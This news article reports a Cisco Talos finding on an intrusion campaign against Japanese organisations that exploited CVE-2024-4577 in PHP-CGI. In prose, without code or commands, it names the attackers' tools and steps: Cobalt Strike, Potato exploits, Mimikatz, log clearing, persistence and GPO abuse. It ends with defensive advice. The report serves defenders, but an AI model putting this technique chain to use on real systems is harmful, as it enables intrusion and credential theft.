A sophisticated cyber-intrusion campaign targeting organizations in Japan has been identified by threat analysts, with a focus on sectors such as technology, telecommunications, entertainment, education, and e-commerce. The campaign, discovered by Cisco Talos, exploited a remote code execution (RCE) flaw in the PHP-CGI implementation on Windows, known as CVE-2024-4577, to gain initial access to targeted entities.
Once inside the systems, the attackers proceeded to deploy Cobalt Strike reverse HTTP shellcode using PowerShell scripts, ensuring continuous remote access. Their post-exploitation activities included privilege escalation, credential theft, and lateral movement using plugins from the publicly available Cobalt Strike kit “TaoWu.”
In their attack strategy, the threat actors utilized a Python exploit script to test for vulnerabilities and injected PowerShell commands into the victim’s machines to download payloads from their command-and-control (C2) server. Privilege escalation was achieved using exploits such as JuicyPotato, RottenPotato, and SweetPotato, while persistence mechanisms involved registry modifications, scheduled tasks, and system process creation.
To evade detection, the attackers cleared Windows event logs using wevtutil commands and conducted network reconnaissance using tools like fscan.exe and Seatbelt.exe. Credential theft was carried out through the use of Mimikatz to dump NTLM hashes and plaintext passwords.
The attackers also employed Ladon.exe to bypass User Account Control (UAC) and execute payloads discreetly, as well as SharpTask.exe, SharpHide.exe, and SharpStay.exe to manipulate registry keys and establish persistent services. For lateral movement, Group Policy Objects (GPOs) were abused using SharpGPOAbuse.exe, allowing the execution of malicious scripts across compromised networks.
Furthermore, the attackers misused cloud-based adversarial frameworks, utilizing containers on Alibaba Cloud to deploy offensive security tools. These tools included Blue-Lotus, a JavaScript webshell for XSS and browser exploitation, BeEF for browser exploitation, and Viper C2, a control framework supporting payload execution on multiple platforms.
Although the tactics used in the attack bear similarities to those of the You Dun (Dark Cloud Shield) hacker group, no definitive attribution has been made. However, analysts have noted resemblances in Cobalt Strike usage, privilege escalation techniques, and credential harvesting strategies.
In light of this sophisticated cyber-intrusion campaign, organizations are advised to patch systems promptly to address CVE-2024-4577, restrict PowerShell execution using group policies, monitor logs for unauthorized registry modifications, and deploy endpoint detection and response (EDR) solutions to detect Cobalt Strike activity. This discovery underscores the importance for organizations to remain vigilant against evolving adversarial tactics, especially those targeting public-facing applications for initial access.